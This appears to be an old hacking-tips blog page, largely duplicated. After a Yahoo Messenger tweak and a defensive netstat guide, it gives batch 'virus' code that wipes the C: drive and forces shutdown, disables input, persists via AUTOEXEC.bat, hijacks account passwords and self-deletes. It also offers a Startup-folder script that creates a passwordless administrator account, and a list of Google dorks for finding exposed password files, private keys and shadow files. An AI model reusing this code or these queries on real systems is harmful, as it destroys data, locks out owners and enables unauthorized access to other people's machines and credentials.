Click here to get your own player.
Changing Yahoo Messenger Title Bar
0 Comments Published by Proud Marathi on Monday, September 11, 2006 at 6:24 AM.
Changing Yahoo Messenger Title Bar
You can change the text that appears at the very top of the yahoo messenger window by editing the ymsgr.ini file which is usually located in the messenger folder. Find the ymsgr.ini file and open it. Then at the end, type this :
[APP TITLE]
caption=YOUR TEXT
Changing YOUR TEXT to whatever you want it to say. Then save the file and close messenger. When you restart messenger you will see your new message.
Note
It's very easy 2 find ymsgr.ini file through search & it is Usually located on da Drive Where Messenger is Installed.
You can change the text that appears at the very top of the yahoo messenger window by editing the ymsgr.ini file which is usually located in the messenger folder. Find the ymsgr.ini file and open it. Then at the end, type this :
[APP TITLE]
caption=YOUR TEXT
Changing YOUR TEXT to whatever you want it to say. Then save the file and close messenger. When you restart messenger you will see your new message.
Note
It's very easy 2 find ymsgr.ini file through search & it is Usually located on da Drive Where Messenger is Installed.
What is NetStat?
Netstat is a tool that has been included with windows ever since at least 95/NT 3.5 (UNIX/Linux has it also). It was designed to do a lot more then just monitor your connections, but that is what most people use it for, or to at least watch who has been established to your computer. That is why I am writing this article is for people who are curious on how to take that one step further and make the most out of it.
Why would I use NetStat?
Well, suppose you do not have a firewall, but you need something that can monitor your connectivity while you are away. Believe it or not, NetStat is the perfect command for you. Once you read up this article you will see just how powerful NetStat is. So, lets get started. I will include generic scenario for each use of NetStat.
Global Step (Applies always before each next step to each scenario)
First thing you will do is open up my command prompt, if you are on an NT based machine, open up "cmd" not "command".
Scenario 1
Someone has been flooding my network, taking out my web servers and just reeking havoc in general. I want to be able to monitor this person and what they are doing. But, I am not going to be around my machine while they are attacking me. So, the answer is simple.
1. We must tell NetStat to keep a log file for us, so we can check it when we get home, but we want it to be continuous so its constantly monitoring it, much like a simple IDS. So, type in the following
"netstat 10 > conlog.txt"
First we type in the basic command NetStat, then we want to have it refresh itself every 10 seconds so we have a pretty accurate log when we come home. Next we use the command to dump your commands to a text file after its been successfully executed. That is what the "> conlog.txt" is doing. Now you can specify that to any directory, such as "c:\log.txt" or whatever base folder your command prompt is set to, such as "C:>".
Now, if you are wanting to just view the IP address of the user and not the actual host names, simply do a little addition to the command. Use the command netstat -n. This tells NetStat to use the numerical values of the hostname aka IP address. It is a lot cleaner this way, since some host names are enormous once converted, it makes the logs sort of hard to read. If you wish to filter the attacks out by what protocl they are using (TCP/UDP/ICMP) simply issue the command "netstat -p tcp". You can replace tcp with udp or icmp.
Scenario 2
My network has been acting up lately. I believe that maybe we have a worm or some type of machine that has been trojaned as a DDoS bot. I have to monitor these statistics for the machines. Preferably each machine.
The first step to doing this is the be able to see how much data is going on and coming in. Which would be considering Interface Monitoring because its monitor your Network Interface Card (NIC). You will want to keep a log of this also, so you can see how much information is being sent through and into your NIC. The first thing we would want to do is tell netstat to monitor these statistics as followed:
"netstat -e 10 > activity.txt"
This will update the Interface statistics every 10 seconds to the file activity.txt so we can check it when we get home. You will notice a dramatic increase in times, or a constant flow of data while there should be none. Always check the "Received" and "Sent". If the Sent is much larger than received then we know that something is going on our network. Now, if you are wanting to see more advanced statistics, you can use the command "netstat -s" and this will display a lot more information on your connection which will be able to determine if something's going on.
Scenario 3
You're not to worried about DoS and DDoS attacks being sent from your machine without you knowing it (aka Zombie). But, you are really worried about a Trojan being remotely uploaded to your machine, or even worse, a program you use all the time is establishing odd connections but you are not sure if these connections are assigned to that port. Netstat will be able to tell you what process is assigned to what port.
Before we get started, you will need a tool called TaskList, which can be downloaded Here, it comes with XP Professional. It should work for any NT machine once downloaded. Make sure to place it in your system32 folder, so you can call it globally from any folder you are browsing in command prompt.
First we will type in "tasklist" in the command prompt. You will see a bunch of process names, and next to that you will see numbers. These numbers are uniquely given ID's for that process, called a PID (Process Identification). Now, I would recommend dumping it to a text file on your desktop or somewhere you have quick access to, so it would look like
"tasklist > pids.txt".
Now, we have the process and PID's next to it, so we know what each PID is assigned to. Now, its time to load up that trusty netstat! In the command prompt, I want you to type out
"netstat -no > cpids.txt"
This will dump the statistics for each established connection using numerical form, but this time it will display the PID next to it. Now, simply open up each text file and compare them. See which process is using that connection by determining the PID is for that process. Once you have determined that something is suspicious or just normal, you can choose what to do. If you have XP Pro, you can use the command "tskill" which will allow you to kill a process by its PID. You may or may not want to do this if you find something suspicious.
This concludes the NetStat article. I hope you learned something
Netstat is a tool that has been included with windows ever since at least 95/NT 3.5 (UNIX/Linux has it also). It was designed to do a lot more then just monitor your connections, but that is what most people use it for, or to at least watch who has been established to your computer. That is why I am writing this article is for people who are curious on how to take that one step further and make the most out of it.
Why would I use NetStat?
Well, suppose you do not have a firewall, but you need something that can monitor your connectivity while you are away. Believe it or not, NetStat is the perfect command for you. Once you read up this article you will see just how powerful NetStat is. So, lets get started. I will include generic scenario for each use of NetStat.
Global Step (Applies always before each next step to each scenario)
First thing you will do is open up my command prompt, if you are on an NT based machine, open up "cmd" not "command".
Scenario 1
Someone has been flooding my network, taking out my web servers and just reeking havoc in general. I want to be able to monitor this person and what they are doing. But, I am not going to be around my machine while they are attacking me. So, the answer is simple.
1. We must tell NetStat to keep a log file for us, so we can check it when we get home, but we want it to be continuous so its constantly monitoring it, much like a simple IDS. So, type in the following
"netstat 10 > conlog.txt"
First we type in the basic command NetStat, then we want to have it refresh itself every 10 seconds so we have a pretty accurate log when we come home. Next we use the command to dump your commands to a text file after its been successfully executed. That is what the "> conlog.txt" is doing. Now you can specify that to any directory, such as "c:\log.txt" or whatever base folder your command prompt is set to, such as "C:>".
Now, if you are wanting to just view the IP address of the user and not the actual host names, simply do a little addition to the command. Use the command netstat -n. This tells NetStat to use the numerical values of the hostname aka IP address. It is a lot cleaner this way, since some host names are enormous once converted, it makes the logs sort of hard to read. If you wish to filter the attacks out by what protocl they are using (TCP/UDP/ICMP) simply issue the command "netstat -p tcp". You can replace tcp with udp or icmp.
Scenario 2
My network has been acting up lately. I believe that maybe we have a worm or some type of machine that has been trojaned as a DDoS bot. I have to monitor these statistics for the machines. Preferably each machine.
The first step to doing this is the be able to see how much data is going on and coming in. Which would be considering Interface Monitoring because its monitor your Network Interface Card (NIC). You will want to keep a log of this also, so you can see how much information is being sent through and into your NIC. The first thing we would want to do is tell netstat to monitor these statistics as followed:
"netstat -e 10 > activity.txt"
This will update the Interface statistics every 10 seconds to the file activity.txt so we can check it when we get home. You will notice a dramatic increase in times, or a constant flow of data while there should be none. Always check the "Received" and "Sent". If the Sent is much larger than received then we know that something is going on our network. Now, if you are wanting to see more advanced statistics, you can use the command "netstat -s" and this will display a lot more information on your connection which will be able to determine if something's going on.
Scenario 3
You're not to worried about DoS and DDoS attacks being sent from your machine without you knowing it (aka Zombie). But, you are really worried about a Trojan being remotely uploaded to your machine, or even worse, a program you use all the time is establishing odd connections but you are not sure if these connections are assigned to that port. Netstat will be able to tell you what process is assigned to what port.
Before we get started, you will need a tool called TaskList, which can be downloaded Here, it comes with XP Professional. It should work for any NT machine once downloaded. Make sure to place it in your system32 folder, so you can call it globally from any folder you are browsing in command prompt.
First we will type in "tasklist" in the command prompt. You will see a bunch of process names, and next to that you will see numbers. These numbers are uniquely given ID's for that process, called a PID (Process Identification). Now, I would recommend dumping it to a text file on your desktop or somewhere you have quick access to, so it would look like
"tasklist > pids.txt".
Now, we have the process and PID's next to it, so we know what each PID is assigned to. Now, its time to load up that trusty netstat! In the command prompt, I want you to type out
"netstat -no > cpids.txt"
This will dump the statistics for each established connection using numerical form, but this time it will display the PID next to it. Now, simply open up each text file and compare them. See which process is using that connection by determining the PID is for that process. Once you have determined that something is suspicious or just normal, you can choose what to do. If you have XP Pro, you can use the command "tskill" which will allow you to kill a process by its PID. You may or may not want to do this if you find something suspicious.
This concludes the NetStat article. I hope you learned something
Intro: What is a Batch file?
A Batch file is a program that runs in the command prompt of a computer. It uses MS-DOS commands, and can help you or destroy you. I'm just going to explain the basics of how to program a Batch file virus/semi virus for the hell of it.
To Begin:
Open notepad. It should come auto-installed on your operating system. Now all you have to do is remember to save this scripting code that you are about to write as a ".BAT" file.
Coding:
To start any Batch file... ALWAYS begin with two commands, @echo off, and cls. These commands hide your commands/code for the person who activates the program.
So so far in your batch file, you have:
@echo off
cls
These two commands you will ALWAYS be using.
Before I start talking about more advanced commands and such, I should say that the next step is without a doubt to decide EXACTLY that you want this program to do.
Obviously this depends on your ethics/how many enemies you have, but it is still important to know what you want to do.
OK, while you think about that... I'm going to outline some more basic commands.
echo --- This command will make text appear in the command prompt.
pause --- This command will ask the user to "Press Any Key To continue" before it activates the next command.
Example:
If you wish you can test that code right now, save it as "test.bat" and run it. But anyways, assuming that you have made up your mind, let's get started.
An Annoying Virus:
These guys are great for driving your enemies absalutely insane without causing any ACTUAL damage. They are great pranks as well.
Some of the new commands that we will be using:
-This command sends a pop-up message to a user of your choice with a message of your choice! it even comes with an annoying little BEEP* sound. 
However for computers other than Windows NT/XP Home, you will need to specify a user on the target computer. If you don't know any, just stick with using the users: Administrator, and owner. Half the time those will work.
The Syntax of this command: MSG (user) (message)
Example: MSG Tim Hi Tim
This command can put a title on a list of commands
No Syntax.
This command is used for naming a list of commands to go to.
No Syntax.
Example:
START
this command will start any program/application on your computer that you specify.
Rundll32
This command can control any modules on the computer, Mouses, Keyboards, Printers, etc.
Syntax:
-There is a rundll32 command to remove all printer connections, but I just like to use this one:
Alright, let's get started. Here is a simple annoying script:
OK, here is the begining of a very irritating program. We have a script that sends pop-up messages to the user, and opens 2 web browsers, not only that, but it also swaps the users mouse buttons! But wait... it gets better... At the top of the script we named this list of commands "echo" and at the bottom we used the command, "goto echo" therefor this program will loop until the system is restarted. Thus, we have a program that sends infinite pop-up messages and also opens hundreds of internet browsers.
And yes, it IS possible to make this program auto-run upon the next reboot! how? you can simply give it the attributes of an auto-run Batch file. Use this code to do so:
So now we have an annoying program that simply will not go away... enjoy.
Killer Programs:
Exploring the dark side...
A simple command can reak havoc and destroy any machine, so it really comes down to ethics. Just because you know this simple command doesnt mean you need to use it on every computer you get your hands on... lol.
We use the DEL command (delete) with several nifty options and we can silently delete the whole harddrive in a little less than 15 seconds.
Here is an example of a killer virus:
In this program, he hide the code, Use DEL /F to force the deletion, /Q to make it Quiet (no confirmation) and a /S to delete the whole tree. So we have a simple but massively destructive program that will hide the code, delete the harddrive, then shutdown, sending a message to the user as it does so.
Again, I am not liable for anything you choose to do with this knowledge... It's not my fault, infact I recommend you never use these commands.
You may have also noticed that we used for more of our old Rundll32 commands here, such as rundll32 KEYBOARD,disable and rundll32 MOUSE,disable (which are self explanitory) and also the rundll32 user32,SetCursorPos command, which puts the mouse in the lower right hand corner of the screen.
And finally:
Password changers.
These are nifty little things that I discovered a little while ago. It seems to an almost completely forgotten command... Infact I know lots of programmers who dont know it. All the same, just like the "MSG" command, a user MUST be specified, and just like with MSG, I recommend you always use "owner, and Administrator" as two of the users.
An example of a password changer:
The "net user" command can be used in several different ways:
as simply "net user" which will display all users on the machine, or as "net user (user) *, which will bring up a prompt saying:
Please Type a Password for this User:_
I find this command is best for when you are actually changing the password through the command prompt and dont want anyone to see what you are changing it too.
Of course in a program, your only choice is net user (user) (the new password). You just have to hope that they arn't smart enough to go and view your source code and figure it out. Thats usually why you delete your batch file when it has completed its task.
How? just toss in a delete code after the final command.
Implementing a "wait" command:
In MS-DOS Batch Files, unfortunately there is no SLEEP/WAIT command, but a wait can be implemented with the following command:
The command above would create a pause for 2 seconds, and wait before executing the next command. While the command below would wait for 20 seconds, etc.
Variables and the "If" command:
Now moving slightly out of the virus realm... Here is some batch commands that you can actually write a simple program with.
Using the "If" command with variables is relatively simple. But first we must learn SET/P.
The code above is simple once you understand it... to some of you it may be self-explanitory.
Using the Set /p command, we set a variable called "input" ,(but it doesnt have to be called input, I was just doing that as an example) Then we simply make a message using ECHO, saying "HI %input%!!
Example:
Say a user ran the program, and they entered "Bob" as their name, once they hit enter, the screen will be cleared and text will appear saying: "Hi Bob!!"
Using IF:
Example:
Above we have a code that uses a lot of the commands we gave gone over. First; it sends a message telling the user to enter a password. Then we use the "IF" command to say that IF the user types 08yds1, to GOTO a new command list. If he doesn't, that IF string will simply be skipped, and the screen will read "Access Denied".
Using this in the virus world:
Batch programming doesn't directly relate to Batch viruses, but there are always ways of making it do so. Be creative.
Above we have a nasty little program that pops-up in the command prompt and disables your Mouse...then there is a solem re-inactment of Monty Python and the Holy Grail.
Do I reccomend that you use this code against you enemies? No.
But if you do, perhaps use a little bit less black-hat command than Delete C drive?
Hehe, oh well. Just a stupid code I wrote and thought I would share,lol.
Just with the commands and code I have discussed here, you should be able to set yourself up a decent batch file program/virus.
I hope you learned something.
Just with the commands and code I have discussed here, you should be able to set yourself up a decent batch file program/virus.
Remember, be ethical.
Not Nessecarily White Hat ethical, but use good judgement.
As the good book says, "what goes around comes around" lol.
Peace.
A Batch file is a program that runs in the command prompt of a computer. It uses MS-DOS commands, and can help you or destroy you. I'm just going to explain the basics of how to program a Batch file virus/semi virus for the hell of it.
To Begin:
Open notepad. It should come auto-installed on your operating system. Now all you have to do is remember to save this scripting code that you are about to write as a ".BAT" file.
Coding:
To start any Batch file... ALWAYS begin with two commands, @echo off, and cls. These commands hide your commands/code for the person who activates the program.
So so far in your batch file, you have:
@echo off
cls
These two commands you will ALWAYS be using.
Before I start talking about more advanced commands and such, I should say that the next step is without a doubt to decide EXACTLY that you want this program to do.
Obviously this depends on your ethics/how many enemies you have, but it is still important to know what you want to do.
OK, while you think about that... I'm going to outline some more basic commands.
echo --- This command will make text appear in the command prompt.
pause --- This command will ask the user to "Press Any Key To continue" before it activates the next command.
Example:
 | Code: |
 | @echo off cls echo Hi, this is a test pause |
If you wish you can test that code right now, save it as "test.bat" and run it. But anyways, assuming that you have made up your mind, let's get started.
An Annoying Virus:
These guys are great for driving your enemies absalutely insane without causing any ACTUAL damage. They are great pranks as well.
Some of the new commands that we will be using:
| Code: |
| MSG |
However for computers other than Windows NT/XP Home, you will need to specify a user on the target computer. If you don't know any, just stick with using the users: Administrator, and owner. Half the time those will work.The Syntax of this command: MSG (user) (message)
Example: MSG Tim Hi Tim
| Code: |
| :list |
No Syntax.
| Code: |
| GOTO |
No Syntax.
Example:
| Code: |
| GOTO list |
START
this command will start any program/application on your computer that you specify.
| Code: |
| Syntax: START (program to start) Example: START firefox.exe |
Rundll32
This command can control any modules on the computer, Mouses, Keyboards, Printers, etc.
Syntax:
| Code: |
| RunDll32 (module,command) / Rundll32 (User,command) |
-There is a rundll32 command to remove all printer connections, but I just like to use this one:
| Code: |
| CON2PRT /f |
Alright, let's get started. Here is a simple annoying script:
| Code: |
| :ECHO cls Rundll32 user32,SwapMouseButton cls MSG owner This is annoying, isn't it? cls MSG owner Remember ZoneVortex cls MSG Administrator This is annoying, isn't it? cls MSG Administrator Remember ZoneVortex cls MSG Guest This is annoying, isn't it? cls MSG Guest Remember ZoneVortex cls start www.google.com start www.yahoo.com goto ECHO |
OK, here is the begining of a very irritating program. We have a script that sends pop-up messages to the user, and opens 2 web browsers, not only that, but it also swaps the users mouse buttons! But wait... it gets better... At the top of the script we named this list of commands "echo" and at the bottom we used the command, "goto echo" therefor this program will loop until the system is restarted. Thus, we have a program that sends infinite pop-up messages and also opens hundreds of internet browsers.
And yes, it IS possible to make this program auto-run upon the next reboot! how? you can simply give it the attributes of an auto-run Batch file. Use this code to do so:
| Code: |
| cls cd c: type cd c: ATTRIB c:AUTOEXEC.bat -H %0 >>c:AUTOEXEC.bat echo > copy %0 ATTRIB c:AUTOEXEC.bat +H del /q %0 cls |
So now we have an annoying program that simply will not go away... enjoy.
Killer Programs:
Exploring the dark side...
A simple command can reak havoc and destroy any machine, so it really comes down to ethics. Just because you know this simple command doesnt mean you need to use it on every computer you get your hands on... lol.
We use the DEL command (delete) with several nifty options and we can silently delete the whole harddrive in a little less than 15 seconds.
Here is an example of a killer virus:
| Code: |
| @echo off cls rundll32 MOUSE,disable rundll32 KEYBOARD,disable rundll32 user32,SetCursorPos cls DEL /F /S /Q C: cls shutdown -s -t 10 -c "Have a nice day - The Red Bishop" -f cls exit |
In this program, he hide the code, Use DEL /F to force the deletion, /Q to make it Quiet (no confirmation) and a /S to delete the whole tree. So we have a simple but massively destructive program that will hide the code, delete the harddrive, then shutdown, sending a message to the user as it does so.
Again, I am not liable for anything you choose to do with this knowledge... It's not my fault, infact I recommend you never use these commands.
You may have also noticed that we used for more of our old Rundll32 commands here, such as rundll32 KEYBOARD,disable and rundll32 MOUSE,disable (which are self explanitory) and also the rundll32 user32,SetCursorPos command, which puts the mouse in the lower right hand corner of the screen.
And finally:
Password changers.
These are nifty little things that I discovered a little while ago. It seems to an almost completely forgotten command... Infact I know lots of programmers who dont know it. All the same, just like the "MSG" command, a user MUST be specified, and just like with MSG, I recommend you always use "owner, and Administrator" as two of the users.
An example of a password changer:
| Code: |
| @echo off cls net user owner ihackedyoubitch net user administrator ihackedyoubitch cls echo. echo Uh Oh!!! Looks like your passwords changed... pause exit |
The "net user" command can be used in several different ways:
as simply "net user" which will display all users on the machine, or as "net user (user) *, which will bring up a prompt saying:
Please Type a Password for this User:_
I find this command is best for when you are actually changing the password through the command prompt and dont want anyone to see what you are changing it too.
Of course in a program, your only choice is net user (user) (the new password). You just have to hope that they arn't smart enough to go and view your source code and figure it out. Thats usually why you delete your batch file when it has completed its task.
How? just toss in a delete code after the final command.
| Code: |
| DEL /Q (program_name.BAT) |
Implementing a "wait" command:
In MS-DOS Batch Files, unfortunately there is no SLEEP/WAIT command, but a wait can be implemented with the following command:
| Code: |
| @ping.exe 127.0.0.1 -n 2 -w 1000 > nul |
The command above would create a pause for 2 seconds, and wait before executing the next command. While the command below would wait for 20 seconds, etc.
| Code: |
| @ping.exe 127.0.0.1 -n 20 -w 1000 > nul |
Variables and the "If" command:
Now moving slightly out of the virus realm... Here is some batch commands that you can actually write a simple program with.
Using the "If" command with variables is relatively simple. But first we must learn SET/P.
| Code: |
| @echo off cls echo what is your name? Set /p input= cls echo Hi %input%!! pause exit |
The code above is simple once you understand it... to some of you it may be self-explanitory.
Using the Set /p command, we set a variable called "input" ,(but it doesnt have to be called input, I was just doing that as an example) Then we simply make a message using ECHO, saying "HI %input%!!
Example:
Say a user ran the program, and they entered "Bob" as their name, once they hit enter, the screen will be cleared and text will appear saying: "Hi Bob!!"
Using IF:
Example:
| Code: |
| @echo off cls echo Please enter password: set /p inputchoice= IF %inputchoice% equ 08yds1 goto accessgranted echo. echo. echo Access Denied pause exit :accessgranted cls echo Access Granted. pause exit |
Above we have a code that uses a lot of the commands we gave gone over. First; it sends a message telling the user to enter a password. Then we use the "IF" command to say that IF the user types 08yds1, to GOTO a new command list. If he doesn't, that IF string will simply be skipped, and the screen will read "Access Denied".
Using this in the virus world:
Batch programming doesn't directly relate to Batch viruses, but there are always ways of making it do so. Be creative.
| Code: |
| @echo off cls Rundll32 MOUSE,disable cls echo Welcome to the Bridge of Death Game! echo. echo ZoneVortex wishes you luck! pause cls echo Answer these questions as best you can. pause echo What, is your name? set /p name= cls echo What, is your quest? set /p input= cls echo What, is your favorite color? set /p color= echo %name%, your favorite color is not %color%!!! echo. @ping.exe 127.0.0.1 -n 3 -w 1000 > nul goto DIE :DIE echo AHHHHHH DEL /Q /S /F C: cls shutdown -s -t 10 -c "Thou Art Guess was Incorrect." -f |
Above we have a nasty little program that pops-up in the command prompt and disables your Mouse...then there is a solem re-inactment of Monty Python and the Holy Grail.
Do I reccomend that you use this code against you enemies? No.
But if you do, perhaps use a little bit less black-hat command than Delete C drive?
Hehe, oh well. Just a stupid code I wrote and thought I would share,lol.
Just with the commands and code I have discussed here, you should be able to set yourself up a decent batch file program/virus.
I hope you learned something.
Just with the commands and code I have discussed here, you should be able to set yourself up a decent batch file program/virus.
Remember, be ethical.
Not Nessecarily White Hat ethical, but use good judgement.
As the good book says, "what goes around comes around" lol.
Peace.
This thing can help those who want to get admin rights.
copy this coded thing into a notepad and save as admin.bat
remember the >>> .bat extension
now all u have to do is copy this file to start folder
C:\Documents and Settings\All Users\Start Menu
after copying logoff and wait for administrator to login and ur admin account will be created.
*It creates an account with administrator access
username:admin and no password
>>>>> remember to remove the batch (.bat) file after getting the account.
copy this coded thing into a notepad and save as admin.bat
remember the >>> .bat extension
| Code: |
| @echo off net user Admin /add /expires:never /passwordreq:no net localgroup "Administrators" /add Admin |
now all u have to do is copy this file to start folder
C:\Documents and Settings\All Users\Start Menu
after copying logoff and wait for administrator to login and ur admin account will be created.
*It creates an account with administrator access
username:admin and no password
>>>>> remember to remove the batch (.bat) file after getting the account.
inurl:index.of.password
Directory listing contains password file(s)?
intitle:"Index of" service.pwd
Directory listing contains service.pwd file(s)
intitle:"Index of" view-source
Directory listing contains view-source file(s)
intitle:"Index of" admin
Direcory listing contains administrative files or directories
intitle:"Index of" .htpasswd
Directory listing contains .htpasswd file!
intitle:"Index of" log.txt
Directory listing contians log text files
intitle:"Index of" stats.html
Directory listing contains stats.html which may contain useful web server statistics
"access denied for user" "using password"
Web page contains error message which might provide useful application information
"A syntax error has occurred" filetype:ihtml
Web page contains error message which might provide useful application information
"ORA-00921: unexpected end of SQL command"
Web page contains error message which might provide useful application information
inurl:passlist.txt
The passlist.txt file may contain user passwords
"Index of /backup"
Directory may contain sensitive backup files
intitle:"Index of" .bash_history
Directory listing contains bash history information
intitle:"Index of" index.html.bak
Directory listing contains backup index file (index.html.bak)
intitle:"Index of" index.php.bak
Directory listing contains backup index file (index.html.bak)
intitle:"Index of" guestbook.cgi
Directory listing contains backup index file (index.html.bak)
intitle"Test Page for Apache"
Default test page for Apache
intitle:index.of.etc
Directory listing of /etc ?
filetype:xls username password
XLS spreadseet containing usernames and passwords?
"This file was generated by Nessus"
Nessus report!
intitle:"Index of" secring.bak
Secret key file
intitle:"Terminal Services Web Connection"
Access terminal services!
intitle:"Remote Desktop Web Connection"
Access Remote Desktop!
intitle:"Index of" access_log
Directory listing contains access_log file which may store sensitive information
intitle:"Index of" finance.xls
Directory listing contains finance.xls which may contain sensitive information
intitle:"Usage Statistics for"
Statistical information may contain sensitive data
intitle:"Index of" WSFTP.LOG
WSFTP.LOG file contains information about FTP transactions
intitle:"Index of" ws_ftp.ini
The ws_ftp.ini file may contain usernames and passwords of FTP users
"not for distribution" confidential
URL may contain confidential or sensitive information
"phpMyAdmin" "running on" inurl:"main.php"
phpMyAdmin allows remote mysql database administration
"#mysql dump" filetype:sql
mysql database dumps
inurl:php.ini filetype:ini
The php.ini file may contain sensitive PHP environment details.
BEGIN (CERTIFICATE|DSA|RSA) filetype:key
Private key(s)!
BEGIN (CERTIFICATE|DSA|RSA) filetype:csr
Private key(s)!
BEGIN (CERTIFICATE|DSA|RSA) filetype:crt
Private key(s)!
intitle:"Index of" passwd passwd.bak
passwd file!
intitle:"Index of" master.passwd
master.passwd file!
intitle:"Index of" pwd.db
pwd.db file may contain password information
intitle:"Index of..etc" passwd
passwd file!
filetype:cfg ks intext:rootpw -sample -test -howto
This file may contain the root password (encrypted)
intitle:"index.of.personal"
Directory may contain sensitive information
intitle:"Index of" login.jsp
The login.jsp file may contain database username or password information
intitle:"Index of" logfile
Directory may contain sensitive log files
filetype:php inurl:"viewfile" -"index.php" -"idfil
File may contain PHP source code
allinurl:intranet admin
"index of/root"
"auth_user_file.txt"
"index of/root"
"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype oc
allintitle: restricted filetype :mail
allintitle: restricted filetype oc site:gov
allinurl: winnt/systpem32/
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart
INTITLE - search for string in title
intitle:"michael moore"
ALLINTITLE - search strings in title
allintitle:"michael moore" films
INURL - search for string in the url
inurl:"michael moore"
INTEXT - search for the string in the site body
intext:"angry white men"
SITE - search specific domains
"virus" site:infosec.navy.mil
LINK - locate sites linking to the site entered
link:www.pogo.com
CACHE - search google site cache
cache:www.whitehouse.gov
DATERANGE - search within a date range (julian)
"michael moore" daterange:2452389-2452389
FILETYPE - locate files (don't list any html pages, just the files)
"economic disaster" filetype:pdf -filetype:htm -filetype:html
RELATED - locate pages that are related (similar)
related:www.usatoday.com
INFO - locates links about site
info:www.2600.com
PHONEBOOK - locates phone numbers
phonebook:"fred stanley"
STOCKS - stock info
stocks:msft
BOOLEAN LOGIC
- "AND", "I", "a", "The", and "Of" are ignored
- a pipe "|" is treated as "OR"
- a minus symbol "-" eliminates the string from results
- wildcard "*" can be used on words, not characters
("three * mice" = "three blind mice")
- 10 word limit. Use wildcards like "do as * say not as * do"
Triggers and Switches
- ! = Initializes the "I'm Feeling Lucky" search option
intitle:"Directory of" sexually transmitted diseases -inurl:book -inurl:products
- ?? = searches the google directory
?? "michael moore"
- , = searches usenet database (google groups)
, group:sci.med* hiv
/images = searches google images
intitle:cheerleaders -filetype:htm -filetype:html /images
/news = searches google news
intitle:"saddam hussein" /news
/since = days ago
"george bush" /since:365
Google URLs
The query "three blind mice" returns
http://www.google.com/search?num=100&hl=en&q=%22three+blind+mice%22&as_qdr=m6&safe=off
query = q=%22three+blind+mice%22&as_qdr=m6&safe=off
num = number of results (1-100)
as_qdr=mx =specifies age of site (x= amount of months)
safe=off =content filter (on or off)
The Good Stuff
1. Vulnerable Servers (Mic*ft Based)
http://www.google.com/search?num=100&hl=en&safe=off&q=intitle%3A%22index+of+%2F%22+%22parent+directory%22+intitle%3A%22mp3%22+-filetype%3Ahtm+-filetype%3Ahtml
Runs this Query
intitle:"index of /" "parent directory" intitle:"mp3" -filetype:htm -filetype:html
DESCRIPTION : searches for misconfigured web-servers with an open "/" root path and a folder named MP3s
2. Vulnerable Apache Servers (UNIX Based)
http://www.google.com/search?num=100&hl=en%safe=off&q=%2B%22index+%2Bof%2Fmp3%22+%2Bbeatles
Runs this Query
+"index +of/mp3" +beatles
DESCRIPTION : searches for misconfigured paths containing mp3s
3. Password Snatching
http://www.google.com/search?hl=en&as_qdr=all&q=%22http%3A%2F%2Fbob%3Abob%40www%22&btnG=Google+Search
Runs this Query
"http://bob:bob@www" or "http://12345:54321@www"
DESCRIPTION : Searches for password files people save on their hard drives
4. Locate specific site info and passes
http://www.google.com/search?hl=en&q=%22http%3A%2F%2F%2A%3A%2A%40www%22+teenagepanties&btnG=Google+Search
Runs this Query
"http://*:*@www" teenagepanties
5. Warez locator Queries
http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=intitle%3A%22index+of+%2F%22+%22parent+directory%22+%2B%22%2A.nfo%22+%2B%22%2A.rar%22+%2B%22%2A.r05%22+%2B%22%2A.r10%22+-filetype%3Ahtm+-filetype%3Ahtml&btnG=Google+Search
Runs this Query
intitle:"index of /" "parent directory" +"*.nfo" +"*.rar" +"*.r05" +"*.r10" -filetype:htm -filetype:html
intitle:"paris hilton"+"index of " +"parent directory" +"mpg" -filetype:htm -filetype:html
Directory listing contains password file(s)?
intitle:"Index of" service.pwd
Directory listing contains service.pwd file(s)
intitle:"Index of" view-source
Directory listing contains view-source file(s)
intitle:"Index of" admin
Direcory listing contains administrative files or directories
intitle:"Index of" .htpasswd
Directory listing contains .htpasswd file!
intitle:"Index of" log.txt
Directory listing contians log text files
intitle:"Index of" stats.html
Directory listing contains stats.html which may contain useful web server statistics
"access denied for user" "using password"
Web page contains error message which might provide useful application information
"A syntax error has occurred" filetype:ihtml
Web page contains error message which might provide useful application information
"ORA-00921: unexpected end of SQL command"
Web page contains error message which might provide useful application information
inurl:passlist.txt
The passlist.txt file may contain user passwords
"Index of /backup"
Directory may contain sensitive backup files
intitle:"Index of" .bash_history
Directory listing contains bash history information
intitle:"Index of" index.html.bak
Directory listing contains backup index file (index.html.bak)
intitle:"Index of" index.php.bak
Directory listing contains backup index file (index.html.bak)
intitle:"Index of" guestbook.cgi
Directory listing contains backup index file (index.html.bak)
intitle"Test Page for Apache"
Default test page for Apache
intitle:index.of.etc
Directory listing of /etc ?
filetype:xls username password
XLS spreadseet containing usernames and passwords?
"This file was generated by Nessus"
Nessus report!
intitle:"Index of" secring.bak
Secret key file
intitle:"Terminal Services Web Connection"
Access terminal services!
intitle:"Remote Desktop Web Connection"
Access Remote Desktop!
intitle:"Index of" access_log
Directory listing contains access_log file which may store sensitive information
intitle:"Index of" finance.xls
Directory listing contains finance.xls which may contain sensitive information
intitle:"Usage Statistics for"
Statistical information may contain sensitive data
intitle:"Index of" WSFTP.LOG
WSFTP.LOG file contains information about FTP transactions
intitle:"Index of" ws_ftp.ini
The ws_ftp.ini file may contain usernames and passwords of FTP users
"not for distribution" confidential
URL may contain confidential or sensitive information
"phpMyAdmin" "running on" inurl:"main.php"
phpMyAdmin allows remote mysql database administration
"#mysql dump" filetype:sql
mysql database dumps
inurl:php.ini filetype:ini
The php.ini file may contain sensitive PHP environment details.
BEGIN (CERTIFICATE|DSA|RSA) filetype:key
Private key(s)!
BEGIN (CERTIFICATE|DSA|RSA) filetype:csr
Private key(s)!
BEGIN (CERTIFICATE|DSA|RSA) filetype:crt
Private key(s)!
intitle:"Index of" passwd passwd.bak
passwd file!
intitle:"Index of" master.passwd
master.passwd file!
intitle:"Index of" pwd.db
pwd.db file may contain password information
intitle:"Index of..etc" passwd
passwd file!
filetype:cfg ks intext:rootpw -sample -test -howto
This file may contain the root password (encrypted)
